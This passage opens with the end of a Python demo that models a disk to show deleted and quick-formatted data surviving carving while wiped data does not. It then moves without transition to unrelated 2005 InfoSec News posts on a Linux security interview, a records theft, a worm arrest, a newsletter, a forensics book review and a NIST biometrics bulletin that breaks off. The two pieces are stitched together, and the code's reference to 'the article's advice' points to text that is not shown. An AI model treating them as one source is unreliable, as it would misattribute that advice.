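BLOCK_SIZE = 16   # tiny blocks so the demo is easy to read
NUM_BLOCKS = 64


class ToyDisk:
    """A flat byte array plus the two things a filesystem keeps beside it:
    an allocation bitmap and a directory mapping names to block lists.
    (Constructed model for demonstration; not a real filesystem's layout.)"""

    def __init__(self, num_blocks=NUM_BLOCKS, block_size=BLOCK_SIZE):
        self.block_size = block_size
        self.media = bytearray(num_blocks * block_size)  # the raw platters/flash
        self.free = [True] * num_blocks                   # allocation bitmap
        self.directory = {}                               # name -> [block indexes]

    def _allocate(self, n):
        blocks = [i for i, is_free in enumerate(self.free) if is_free][:n]
        if len(blocks) < n:
            raise OSError("disk full")
        for i in blocks:
            self.free[i] = False
        return blocks

    def write_file(self, name, data):
        n = -(-len(data) // self.block_size)  # ceiling division: blocks needed
        blocks = self._allocate(n)
        for k, b in enumerate(blocks):
            chunk = data[k * self.block_size:(k + 1) * self.block_size]
            start = b * self.block_size
            self.media[start:start + len(chunk)] = chunk
        self.directory[name] = blocks

    def delete_file(self, name, wipe=False):
        """'Delete key' semantics: drop the directory entry and mark the blocks
        reusable. Only when wipe=True are the blocks overwritten first."""
        blocks = self.directory.pop(name)
        for b in blocks:
            if wipe:
                start = b * self.block_size
                self.media[start:start + self.block_size] = bytes(self.block_size)
            self.free[b] = True

    def quick_format(self):
        """A quick format rebuilds only the metadata; the media is untouched."""
        self.directory.clear()
        self.free = [True] * len(self.free)

    def carve(self, pattern):
        """What a recovery tool does: ignore the metadata and scan the raw media.
        Returns the byte offsets at which the pattern is still present."""
        hits, pos = [], self.media.find(pattern)
        while pos != -1:
            hits.append(pos)
            pos = self.media.find(pattern, pos + 1)
        return hits


def demo():
    """Run the three scenarios and report how many copies of the secret survive."""
    marker = b"password=hunter2"  # constructed sample secret, exactly one block
    contents = b"session=abc123; " + marker + b"; user=alice"
    results = {}

    disk = ToyDisk()
    disk.write_file("cookies.txt", contents)
    disk.delete_file("cookies.txt")                 # plain delete: metadata only
    results["after_delete"] = len(disk.carve(marker))

    disk.quick_format()                             # still metadata only
    results["after_quick_format"] = len(disk.carve(marker))

    other = ToyDisk()
    other.write_file("cookies.txt", contents)
    other.delete_file("cookies.txt", wipe=True)     # overwrite, then release
    results["after_wipe"] = len(other.carve(marker))
    return results


if __name__ == "__main__":
    print(demo())
```

The wipe here is a single pass of zeros over the file's own blocks, which is enough to make the point in a model; on real hardware the article's advice stands, since wear-levelling flash and remapped sectors can keep copies the host cannot address, which is why a forensics firm or physical destruction is recommended for sensitive media.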
From isn at c4i.org Wed Sep 14 04:30:26 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 14 04:36:18 2005
Subject: [ISN] The Next 50 Years of Computer Security: An Interview with Alan Cox
Message-ID:

http://www.oreillynet.com/pub/a/network/2005/09/12/alan-cox.html

by Edd Dumbill
09/12/2005

Author's note: Alan Cox needs little introduction--most will know him for his long-standing work on the Linux kernel (not to mention his appreciation and promulgation of the Welsh language among hackers). Cox is one of the keynote speakers at EuroOSCON this October, where he will talk about computer security.

According to Alan Cox, we're just at the beginning of a long journey into getting security right. Eager for directions and a glimpse of the future, O'Reilly Network interviewed him about his upcoming keynote.

Edd Dumbill: You're talking about the next 50 years of computer security at EuroOSCON. How would you sum up the current state of computer security?

Alan Cox: It is beginning to improve, but at the moment computer security is rather basic and mostly reactive. Systems fail absolutely rather than degrade. We are still in a world where an attack like the slammer worm combined with a PC BIOS eraser or disk locking tool could wipe out half the PCs exposed to the internet in a few hours. In a sense we are fortunate that most attackers want to control and use systems they attack rather than destroy them.

ED: Linux sysadmins see a security advisory and fix practically every day now. Is this sustainable, and does it harm Linux that this happens?

AC: It isn't sustainable and it isn't going to work forever. Times between bug discovery and exploits have dropped dramatically and better software tools will mean better and faster written exploits, as well as all the good things. I think it harms Linux perhaps less than most systems because Linux security has been better than many rivals. However, even the best systems today are totally inadequate.
Saying Linux is more secure than Windows isn't really addressing the bigger issue--neither is good enough.

ED: You say that we're only just at the beginning of getting computer security right. What are the most promising developments you see right now?

AC: There are several different things going on. Firstly, the once-stagnant world of verification tools has finally begun to take off and people have started to make usable code verification and analysis tools. This helps enormously in stopping mistakes getting into production. Related to this, languages are changing and developing. Many take some jobs away from the programmer and make it harder or near impossible to make certain mistakes. Java for example has done a lot to make memory allocation bugs and many kinds of locking errors very hard to make.

The second shift has been towards defense in depth. No-execute flags in processors and software emulation of them, randomization of the location of objects in memory and SELinux help control, constrain and limit the damage an attacker can do. That does help. There have been several cases now where boxes with no-execute or with restrictive SELinux rulesets are immune to exploits that worked elsewhere.

SELinux also touches on the final area--the one component of the system you cannot verify, crash test, and debug: the user. Right now, systems rely on user education and reminding users "do not install free screen savers from websites" and the like. The truth is, however, that most users don't read messages from their IT staff, many don't understand them and most will be forgotten within a month. SELinux can be used to turn some of these into rigid policy, turning a virus outbreak into a helpdesk call of "the screen saver won't install."

This last area is very important. We know the theory of writing secure computer programs. We are close to knowing how to create provably secure computer systems (some would argue we can--e.g. EROS).
The big hurdles left are writing usable, manageable, provably secure systems, and the user. It's important perhaps to point out here that secure programs, reliable programs and correct programs are all different things. Knowing how to write provably secure programs is very different from saying we know how to write reliable or correct programs.

ED: Can security in software development be meaningfully incorporated into tools, so it doesn't end up stifling the productivity of developers?

AC: The current evidence is yes. Many of the improvements actually increase programmer productivity by taking away tedious tasks like memory management, or identifying potential bugs at compile time and saving the programmer from chasing bugs for days, and because many of them use labeling techniques where you have to indicate when you mean to do unusual things--actually making code easier for other humans to analyze.

There is no evidence that sparse has slowed kernel development, tainting features have hindered Perl, or that Java memory management harmed most productivity. The tools are doing by machinery what is hard to do by hand. Bad tools could slow people down, but good tools do not.

ED: Isn't there a fundamental level at which security concerns and the freedom of individuals to innovate are opposed? Is there an end in sight to open source software created by small numbers of people?

AC: There are areas where they come together--obvious ones are safety critical systems. It's just possible that you don't want nuclear power station employees innovating on site, for example.

There are 'security' systems such as 'trusted computing' that can be abused by large corporations to block innovation, and unfortunately the EU ministers seem to want to help them, not their citizens. Whether the EU commission is corrupt, incompetent, or just misguided is open to debate but the results are not pretty. We've seen that with the X-Box.
Microsoft sells you a product and threatens to sue you for using it to its full. Those same tools, however, are valuable to end users, providing they have control over them. The same cryptographic technology that will let Apple lock their OS to apple branded x86 computers is there for me to keep personal data secure if a future laptop is stolen. It is a tool, unfortunately a tool that can be easily abused. To a homeowner a secure house is generally good, but if you lose control of the key, it can be a positive hindrance. TCPA is no different.

ED: Where is the ultimate driving force for implementing secure software going to come from? It seems that regulatory enforcement, such as in the pharmaceutical industry, might be the only way to properly protect the consumer.

AC: At the moment it is coming from the cost of cleaning up. Other incentives come from statutory duties with data protection, and also from bad publicity. In the future they might also come from lawsuits--for example, if an incompetently run system harms another user--or from Government. In theory as we get better at security the expected standard rises and those who fail to keep up would become more and more exposed to negligence claims.

The bad case is that someone or some organization unleashes a large scale internet PC destroyer before we are ready and legislation gets rushed through in response. That will almost certainly be bad legislation.

-=-

Edd Dumbill is Editor at Large for O'Reilly Network, and co-author of Mono: A Developer's Notebook. He also writes free software for GNOME, and packages Bluetooth-related software for the Debian GNU/Linux distribution. Edd has a weblog called Behind the Times.

Copyright © 2005 O'Reilly Media, Inc.
From isn at c4i.org Wed Sep 14 04:30:42 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 14 04:39:11 2005
Subject: [ISN] Fort Carson records stolen
Message-ID:

http://www.rockymountainnews.com/drmn/state/article/0,1299,DRMN_21_4076654,00.html

By Dick Foster
Rocky Mountain News
September 13, 2005

COLORADO SPRINGS - Fort Carson has cautioned thousands of its soldiers to watch their credit records carefully following the theft of computerized personnel records from the post.

Thieves broke into the Soldier Readiness Processing center over the weekend of Aug. 20-21 and stole four computer hard drives containing thousands of personnel records, Fort Carson spokeswoman Dee McNutt said Monday.

The records include names, Social Security numbers, ages, ranks, jobs, citizenship information and unit affiliations of soldiers and civilians who had been processed through the center since January, McNutt said.

Soldiers must update their personnel information through the center at least once a year, or whenever they are deploying or transferring to or from the post. Civilian federal employees and contractors deploying with military units also must register.

The 3rd Armored Cavalry Regiment's 5,300 soldiers deployed to Iraq in March, and the 2nd Brigade, 2nd Infantry Division, with about 4,000 soldiers, arrived at the post in July, so most of those soldiers' records were contained on the hard drives that were stolen, McNutt said.

So far, McNutt said, no credit fraud or identity theft complaints involving the stolen records have been made to authorities.

Fort Carson has advised all of its soldiers, on post and deployed, how to protect themselves against possible identity theft arising from the stolen records.

"We've told them to put a fraud alert on their credit reports," said McNutt.

Soldiers also can place an "active duty alert" on their credit report.
The alerts require businesses to verify the identity of anyone applying for credit under the name of active duty military personnel, said Holly Petraeus, senior program consultant for the Better Business Bureau Military Line.

"Their best defense is to watch for anything unusual and keep an eye on their bills and credit reports," Petraeus said.

Soldiers were advised to close any affected credit card or other financial account if irregularities are seen, and to file police reports and a complaint with the Federal Trade Commission, McNutt said.

Fort Carson's is not the first theft of military personnel records this year. In August a suspected hacker tapped into an Air Force database containing records of 33,000 officers and enlisted personnel.

The Army's Criminal Investigation Division is investigating the Fort Carson break-in, but there are no suspects, McNutt said.

"This could happen in any corporation," said McNutt. "It's always good to be aware that your personal information could get out there and you should know the steps you need to protect it."

From isn at c4i.org Wed Sep 14 04:29:44 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 14 04:39:20 2005
Subject: [ISN] Computer worm suspect in court
Message-ID:

http://edition.cnn.com/2005/TECH/internet/09/13/morocco.worm.reut/

September 13, 2005

RABAT, Morocco (Reuters) -- A Moroccan magistrate questioned an 18-year-old science student in court on Tuesday about his alleged role in unleashing computer worms that disrupted networks across the United States last month.

Farid Essebar appeared before the investigating magistrate in Rabat for three hours of questioning about the Zotob worm, his lawyer said.

The worm caused computer outages at more than 100 U.S. companies, including major media outlets like CNN and The New York Times.

"My client Farid Essebar was interrogated by a Rabat court investigating judge over the Zotob worm release on the Internet.
He was returned back to detention in a Rabat jail," said his lawyer, Mohamed Fertat.

Essebar, an experimental science student who has been in jail since his arrest on August 25, was remanded in custody and will be questioned again on September 21, Fertat added.

Essebar's arrest in Morocco was part of a coordinated operation involving Turkish authorities who detained 21-year-old Attila Ekici, also suspected of involvement in the release of the Zotob worm, the FBI said in Washington.

Fertat said Moroccan law allows authorities to hold a suspect in custody for two months and this can be renewed five times if necessary.

"I expect the investigation to find him not guilty and that he will not be charged of any crime," he added.

Court or police officials were not immediately available for comment.

Despite the Zotob worm's power, it did not create such widespread havoc as previous malicious software programs like SQL Slammer and MyDoom.

The FBI said close teamwork with Microsoft Corp. and authorities in Morocco and Turkey helped net Essebar and Ekici 12 days after the attack.

Copyright 2005 Reuters

From isn at c4i.org Thu Sep 15 00:50:14 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 15 00:57:43 2005
Subject: [ISN] Security UPDATE -- Lessons in Disaster Recovery -- September 14, 2005
Message-ID:

====================

This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE.

Supercharging SMS for Effective Asset Management
http://list.windowsitpro.com/t?ctl=1387E:4FB69

====================

1. In Focus: Lessons in Disaster Recovery

2. Security News and Features
- Recent Security Vulnerabilities
- McAfee and Microsoft Warn About ASP.NET Forms Authentication
- eEye's Lengthy Laundry List of Vulnerabilities

3. Security Toolkit
- Security Matters Blog
- FAQ
- Security Forum Featured Thread

4. New and Improved
- Make Your Public PCs More Resilient

====================

==== 1. In Focus: Lessons in Disaster Recovery ====
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

I seriously doubt that there is a person reading this newsletter who doesn't know of the devastation caused by Hurricane Katrina. Vast areas of the southern coast of the United States have been destroyed. People's lives are in ruins, and how long it will take to recover is still unknown. The human suffering and loss of life is heart wrenching, to put it mildly, and although I have a difficult time thinking about protecting computer systems in the wake of such disaster, such protection is in fact the focus of this newsletter. Therefore I think it's appropriate to revisit disaster recovery in terms of information security and computer networks.

Katrina brings to light the fact that you and your business can be displaced not just temporarily, but for significant periods of time. A robust disaster recovery plan is paramount.

Katrina shows us that in addition to thinking about system and communication failure, you should also consider the possibility that your premises might be destroyed and rendered unusable either temporarily or permanently. You need to think about system recovery, but you also need to consider hardware replacement or recovery, relocating available personnel in new office space, and replacing communication systems.

Data backup strategies can include offsite storage by either physically transporting media somewhere or by using a backup system that transmits data over a communication link. Either way, you should probably use an offsite backup location that's in a completely different geographic area. You should also consider maintaining live backup Web sites, mail servers, and DNS systems that are ready to go.
If you plan these right, they'll kick into action immediately as soon as anything at your main site goes down.

To get in touch with key employees after a disaster, you might need conventional-phone alternatives such as cell phones and Voice over IP (VoIP) tools. However, if cell towers and other communication lines fail, then those technologies will also be useless. You could consider getting satellite phones if your business needs justify the cost.

You'll also need a quick exit strategy. If you must evacuate the area, what will you take, aside from obvious essentials? You could gather disk drives that contain mission-critical data and other devices if you have time.

One easy way to help protect hardware and documents you might need to take with you or leave behind is to waterproof them by using a product such as Space Bags (see URL below). Having a big safe or vault to store hardware might be a good idea too. After all, if the building collapses, Space Bags won't be much help.
http://list.windowsitpro.com/t?ctl=13897:4FB69

In addition, you might consider the fact that you might have to leave a lot of data behind. If it's sensitive information, then it should be encrypted in case the hardware falls into the wrong hands in your absence. You probably won't have time to start encrypting data during a crisis, so you need to have such a process in place beforehand.

Those are a few ideas that might help you review your disaster recovery plans. As I've written before, you need to be ready to take action quickly on short notice and be ready to recover quickly from events that strike with little or no advance warning. A comprehensive disaster response and recovery plan is part of good business security.

You can find more information about disaster recovery for OSs, databases, email systems, and more in numerous articles on our Web site.
http://list.windowsitpro.com/t?ctl=1387C:4FB69

-----

The Microsoft Professional Developers Conference 2005 (PDC05) is this week in Los Angeles. Check out Paul Thurrott's PDC05 blog on our Web site to find out the latest development news from LA.
http://list.windowsitpro.com/t?ctl=13888:4FB69

====================

==== Sponsor: Scalable Software ====

Supercharging SMS for Effective Asset Management
Cost control and license compliance have risen to the top of the IT asset and desktop management agenda. Learn to map Microsoft's SMS to specific business objectives and examine the pitfalls of relying solely on SMS to achieve business IT asset management objectives. Download this free white paper now and find out how you can leverage technology to bridge the gap between technical professionals and your CFO.
http://list.windowsitpro.com/t?ctl=1387E:4FB69

====================

==== 2. Security News and Features ====

Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at
http://list.windowsitpro.com/t?ctl=13887:4FB69

McAfee and Microsoft Warn About ASP.NET Forms Authentication
McAfee published a white paper that helps developers understand how to better protect against replay attacks in applications based on ASP.NET. Microsoft also published an article about the problem, which pertains to forms authentication. Both Microsoft and McAfee recommend a series of defenses.
http://list.windowsitpro.com/t?ctl=1388F:4FB69

eEye's Lengthy Laundry List of Vulnerabilities
Since the end of March, eEye Digital Security has discovered no less than nine vulnerabilities in Microsoft products, two in RealNetworks products, and one in Macromedia products. No patches are publicly available for any of these problems.
http://list.windowsitpro.com/t?ctl=13890:4FB69

====================

==== Resources and Events ====

Windows Connections 2005 Conference--October 31 - November 3, 2005
At the Manchester Grand Hyatt in San Diego, Microsoft and Windows experts present over 40 in-depth sessions with real-world solutions you can take back and apply today. Register now to save $100 off your conference registration and attend sessions at Microsoft Exchange Connections free!
http://list.windowsitpro.com/t?ctl=13895:4FB69

Identify the Key Security Considerations for Wireless Mobility
Wireless and mobile technologies are enabling enterprises to gain a competitive advantage through accelerated responsiveness and increased productivity. In this free, on-demand Web seminar, you'll receive a checklist of risks to factor in when considering your wireless mobility technology evaluations and design. Sign up today and learn all you need to know about firewall security, transmission security, OTA management, management of third-party security applications, and more!
http://list.windowsitpro.com/t?ctl=13884:4FB69

Get Ready for the SQL Server 2005 Roadshow in Europe
Back By Popular Demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a one-year membership to PASS and one-year subscription to SQL Server Magazine. Register now.
http://list.windowsitpro.com/t?ctl=13882:4FB69

Discover SQL Server 2005 for the Enterprise. Are you prepared?
In this free, half-day event you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical, enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today!
http://list.windowsitpro.com/t?ctl=13885:4FB69

Cut Your Windows XP Migration Time by 60% or More!
If your organization is considering--or has already begun--migrating your operating system to Windows XP, then this Web seminar is for you. Sign up for this free event and you'll learn how to efficiently migrate your applications into the Windows Installer (MSI) format and prepare them for error-free deployment and what steps you need to package your applications quickly and correctly and more!
http://list.windowsitpro.com/t?ctl=13886:4FB69

Walking the Tightrope Between Recovery and Continuity
There's a big difference between the ability to quickly recover lost or damaged data and the ability to keep your messaging operations running normally before, during, and after an outage. In this free Web seminar, you'll learn what the technical differences between recovery and continuity are, when each is important, and what you can do to make sure that you're hitting the right balance between them.
http://list.windowsitpro.com/t?ctl=13881:4FB69

====================

==== Featured White Paper ====

How to Solve the Anti-Spam Dilemma
In this free white paper, learn why older spam prevention technologies using traditional content filtering don't work against the latest spammer tactics--and why more corporate email administrators are turning to a managed email security service. Discover how to achieve email security with multiple-layer protection, minimize false positives, cut email administration costs, and keep user communities happy and productive. Download your copy today!
http://list.windowsitpro.com/t?ctl=13880:4FB69

====================

==== Hot Release ====

Download Free: Patch & Spyware Management in one easy-to-use GUI.
Is your network safe from Spyware? The first step to securing your network is to remove spyware, adware, and malware. Next, patch your systems to stop re-infestation.
Remediate Spyware and install Patches with Shavlik NetChk Protect for a Complete Security Solution. To download free software visit:
http://list.windowsitpro.com/t?ctl=13893:4FB69

====================

==== 3. Security Toolkit ====

Security Matters Blog: Some Vulnerabilities Are Downright Funny
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=13892:4FB69

Full Disclosure is a decent mailing list, although the conversation can at times become childish and full of offensive language. Once in a while, a truly funny post comes across the list to lighten the discussion. Read this blog item for a little comedic relief.
http://list.windowsitpro.com/t?ctl=1388D:4FB69

FAQ
by John Savill, http://list.windowsitpro.com/t?ctl=13891:4FB69

Q: I'm trying to copy a user profile, but the Copy To button is grayed out in the dialog box in the System Control Panel applet. How can I access that functionality?

Find the answer at
http://list.windowsitpro.com/t?ctl=1388E:4FB69

Security Forum Featured Thread: Securing Microsoft Access
A forum participant has a Microsoft Access database on the company network and wants some people to be able to read it and others to be able to make changes to it. When he chooses what he thinks are the proper security settings in Tools, Security, he gets a "Not a valid account name or password" error message. Does he need to save an .mdw file to a particular folder, and can he create passwords on the fly? Join the discussion at
http://list.windowsitpro.com/t?ctl=1387F:4FB69

====================

==== Announcements ====
(from Windows IT Pro and its partners)

Get All the Scripting Answers You Need
If you haven't seen the Windows Scripting Solutions newsletter, you're missing out on an exclusive monthly resource that shows you how to automate time-consuming administrative tasks by using our expert-reviewed downloadable code and scripting techniques. Subscribe now and find out how you can save both time and money.
Plus, get online access to our popular "Shell Scripting 101" series--click here:
http://list.windowsitpro.com/t?ctl=13889:4FB69

SQL Server Magazine Has What IT Professionals Need
Get SQL Server Magazine and get answers! Subscribe today and get an entire year for just $39.95--that's 44% off the cover price. You'll also gain exclusive access to the entire SQL Server Magazine article database (over 2300 articles) and get the Top SQL Tips handbook (over 60 helpful tips) FREE. This is a limited-time, risk-free offer, so click here now:
http://list.windowsitpro.com/t?ctl=1388B:4FB69

====================

==== 4. New and Improved ====
by Renee Munshi, products@windowsitpro.com

Make Your Public PCs More Resilient
Jackson Backup offers the Jackson Armor Card, a PCI card that provides fast recovery technology for computers in schools, libraries, cyber cafes, and other public places. Jackson Armor Card is designed to protect a PC's OS and program settings; it guards against any form of corruption or unwanted modification, accidental or intentional damage to the hard drive, hacking, viruses, tampering, and most accidents including formatting. To recover the PC's original settings and data after an incident, you simply reboot the system. The Jackson Armor Card costs $79.99. For more information, go to
http://list.windowsitpro.com/t?ctl=13896:4FB69

Tell Us About a Hot Product and Get a T-Shirt!
Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com.

Editor's note: Share Your Security Discoveries and Get $100
Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column.
Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length.

====================

==== Sponsored Links ====

Argent Versus MOM 2005
Download Argent Versus Microsoft Operations Manager 2005
http://list.windowsitpro.com/t?ctl=1387D:4FB69

Is Your Office Truly Fax Integrated?
Download this free whitepaper from Faxback and find out!
http://list.windowsitpro.com/t?ctl=13883:4FB69

====================

==== Contact Us ====

About the newsletter -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=13894:4FB69
About product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com

====================

This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today.
http://list.windowsitpro.com/t?ctl=1388C:4FB69

View the Windows IT Pro privacy policy at
http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department
Copyright 2005, Penton Media, Inc. All rights reserved.

From isn at c4i.org Thu Sep 15 00:50:45 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 15 00:58:09 2005
Subject: [ISN] REVIEW: "Forensic Discovery", Dan Farmer/Wietse Venema
Message-ID:

Forwarded from: "Rob, grandpa of Ryan, Trevor, Devon & Hannah"

BKFORDIS.RVW   20050310

"Forensic Discovery", Dan Farmer/Wietse Venema, 2005, 0-201-63497-X, U$39.99/C$57.99
%A   Dan Farmer zen@fish2.com
%A   Wietse Venema wietse@porcupine.org
%C   P.O. Box 520, 26 Prince Andrew Place, Don Mills, Ontario M3C 2T8
%D   2005
%G   0-201-63497-X
%I   Addison-Wesley Publishing Co.
%O   U$39.99/C$57.99 800-822-6339 Fax: (617) 944-7273 bkexpress@aw.com
%O   http://www.amazon.com/exec/obidos/ASIN/020163497X/robsladesinterne
  http://www.amazon.co.uk/exec/obidos/ASIN/020163497X/robsladesinte-21
%O   http://www.amazon.ca/exec/obidos/ASIN/020163497X/robsladesin03-20
%O   Audience a+ Tech 3 Writing 1 (see revfaq.htm for explanation)
%P   217 p.
%T   "Forensic Discovery"

In the preface, the authors don't promise to teach the reader anything about computer or digital forensics. Rather, they are reporting on ten years' worth of experience in looking into attacked machines. Given the authors' background, this is engrossing. But turning it into useful guidance might be left as an exercise for the reader. This is not a tutorial work for the novice, but a challenge to the experienced professional.

Part one outlines the basic concepts of forensics in digital systems. Chapter one presents the "spirit of forensic discovery": look anywhere, for anything, and be prepared when you find it. (This is a tall order, particularly the "being prepared" part, but it basically corresponds to my experience.) Time information and stamps (on UNIX systems) are discussed in chapter two, along with mention of the ways that clumsy attempts to "save" systems can destroy ephemeral information. However, the level of the material sweeps between broadly generic and tightly specific: it may be difficult for those not already thoroughly familiar with forensic activities to obtain useful guidance from it.

Part two is supposed to provide us with background on the abstractions of the computer and operating systems that relate to forensic recovery of materials. Chapter three addresses file system basics, but does so specifically with regard to the UNIX system. The content is much more detailed than conceptual (covering, for example, allowable characters in UNIX filenames), and command examples are not always completely explained.
The usefulness of this approach is questionable, since the reader is assumed to know the UNIX system well; in which case, why cover the elementary fundamentals? However, the work does highlight aspects of operating and file system internals not encountered in normal administrative activity.

Analysis of information recovered from a compromised system is reviewed in chapter four. The methods and procedures are very strictly limited by the case cited, but the examples demonstrate the backhanded thinking needed to obtain interesting data after an intrusion.

A variety of intriguing ways to subvert a running system are examined in chapter five. As with previous material, the text seems to talk around the topic, while the examples, although fascinating, don't always support the general concepts under discussion.

Analysis of the code of malicious software (a practice known in virus research as forensic programming) is addressed in chapter six, although the bulk of the content deals with test execution of the programming (under various forms of restriction) and both the benefit and complexity of disassembly are passed over rather lightly.

Part three moves beyond the concepts and into practical difficulties. Chapter seven, although titularly about the contents of deleted files, is primarily concerned with the conservation and preservation of the access, modification, and (attribute) change times of files. (In response to the draft of this review, the authors clarified some of the points that they were trying to make in the text, such as the fact that material from deleted files is often more persistent than the content of active files. Unfortunately, these points, while arresting, are not always clear in the work itself.)

Retrieving data from memory, particularly via the swap or paging areas of disk, is reviewed in chapter eight.
The preface does state that the authors intend this book to be useful to sysadmins, incident responders, computer security professionals, and forensic analysts. I would suggest that only the last group will find much here that they can use, and then only those at the advanced edges of the field. There is certainly much that is intriguing, but the material demands of the reader that he or she have extensive background and knowledge of system and filesystem internals. Even then, extracting the information from the target system, and drawing conclusions as to the implications of that data, will be difficult.

Farmer and Venema have outlined some fascinating material, on the bleeding edge of the technology, but have not made it easy for practitioners to utilize or comprehend.

(In response to the draft review, the authors have noted that the full, original text of the book is now available at http://fish2.com/forensics/ or http://www.porcupine.org/forensics/.)

copyright Robert M. Slade, 2005   BKFORDIS.RVW   20050310

======================
(quote inserted randomly by Pegasus Mailer)
rslade@vcn.bc.ca      slade@victoria.tc.ca      rslade@sun.soci.niu.edu
I believe that Canada cannot, indeed that Canada must not survive by force. The country will only remain united - it should only remain united - if its citizens want to live together in one civil society.
    - Pierre Elliott Trudeau, Nov. 15, 1976
http://victoria.tc.ca/techrev    or    http://sun.soci.niu.edu/~rslade

From isn at c4i.org Thu Sep 15 00:51:46 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 15 00:58:29 2005
Subject: [ISN] ITL Bulletin for September 2005
Message-ID:

Forwarded from: Elizabeth Lennon

ITL BULLETIN FOR SEPTEMBER 2005

BIOMETRIC TECHNOLOGIES: HELPING TO PROTECT INFORMATION AND AUTOMATED TRANSACTIONS IN INFORMATION TECHNOLOGY SYSTEMS

Shirley Radack, Editor
Computer Security Division
Information Technology Laboratory
National Institute of Standards and Technology
Technology Administration
U.S. Department of Commerce

Biometric technologies are crucial components of secure personal identification and verification systems, which control access to valuable information, to economic assets, and to parts of our national infrastructure. Biometric-based identification and verification systems support our information-based economy by enabling secure financial transactions and online sales, and by facilitating many law enforcement, health, and social service activities. Since September 11, 2001, our national requirements to strengthen homeland security have intensified, stimulating government and industry interest in applying biometric technologies to the automated verification of the identity of individuals.

What Are Biometrics

Biometric technologies are automated methods for identifying a person or verifying a person's identity based on the person's physiological or behavioral characteristics. Physiological characteristics include fingerprints, hand geometry, and facial, voice, iris, and retinal features; behavioral characteristics include the dynamics of signatures and keystrokes. Biometric technologies capture and process a person's unique characteristics, and then authenticate that person's identity based on comparison of the record of captured characteristics with a biometric sample presented by the person to be authenticated.

After many years of research and development, biometric technologies have become reliable and cost-effective, and acceptable to users. New applications of biometrics are being successfully implemented in more secure travel documents, visas, and personal identity verification cards. These applications help to safeguard valuable assets and information, strengthen homeland security, and contribute to the safety and security of automated transactions.
Interest in Applications of Biometric Technology

Both public and private sectors are looking for reliable, accurate, and practical methods for the automated authentication of identity, and are using biometric technologies in a wide variety of applications, including health and social service programs, passport programs, driver licenses, electronic banking, investing, retail sales, and law enforcement.

Authentication systems are usually characterized by three factors:

* Something that you know, such as a password,
* Something that you have, such as an ID badge, and/or
* Something that you are, such as your fingerprints or your face.

Systems that incorporate all three factors are stronger than those that use only one or two factors. Authentication using biometric factors can help to reduce identity theft and the need to remember passwords or to carry documents, which can be counterfeited. When biometric factors are used with one or two other factors, it is possible to achieve new and highly secure identity applications. For example, a biometric factor can be stored on a physical device, such as a smart card that is used to verify the identification of an individual. Today, the identification cards that are issued to employees for access to buildings and to information, and the cards that are used for financial transactions, often include biometric information.

Biometric factors can also be used with encryption keys and digital signatures to enhance secure authentication. For example, biometric information could be protected by public key infrastructure (PKI) systems that incorporate encryption (such as Federal Information Processing Standard [FIPS] 197, Advanced Encryption Standard). Encrypting the biometric information helps to make the system more tamper resistant.
NIST Role in Biometrics

The Information Technology Laboratory (ITL) of the National Institute of Standards and Technology (NIST) has been a major contributor to the development of measurements, standards, and tests for biometrics for many years. Areas of investigation include fingerprints, face recognition, iris recognition, and speech recognition. NIST supports the development of voluntary industry standards and the development of conformance tests, reference implementations, and evaluation procedures to facilitate the implementation of standards in biometric products. Recent legislation directed NIST to work with other federal agencies to develop standards needed for the biometric authentication of applicants for U.S. visas. In advancing the development of measurements and standards for biometrics, NIST works in close cooperation with industry, national and international standards groups, and federal, state, and local government organizations.

This bulletin summarizes some of NIST's activities to support biometric standards and measurements, and updates the ITL Bulletin issued in May 2001 detailing NIST's biometric technology and standards activities: Biometrics - Technologies for Highly Secure Personal Authentication, by Fernando L. Podio. Information about NIST, industry, and standards activities, as well as listings of publications and references, is available on the Biometrics Resource Center website:
http://www.nist.gov/biometrics

Under the Federal Information Security Management Act of 2002 (FISMA), NIST develops standards and guidelines to protect the security and privacy of sensitive unclassified information processed in federal computers.
NIST supports the development of voluntary industry standards, both nationally and internationally, as the preferred source of standards to be used by the federal government, enabling it to rely upon the private sector to supply it with goods and services (National Technology Transfer and Advancement Act of 1995 [Public Law 104-113]). NIST's Information Technology Laboratory (ITL) has been accredited as a standards developer by the American National Standards Institute (ANSI). Information about ITL's information security activities is available from the Computer Security Resource Center at:
http://csrc.nist.gov/

New Requirements for Homeland Security

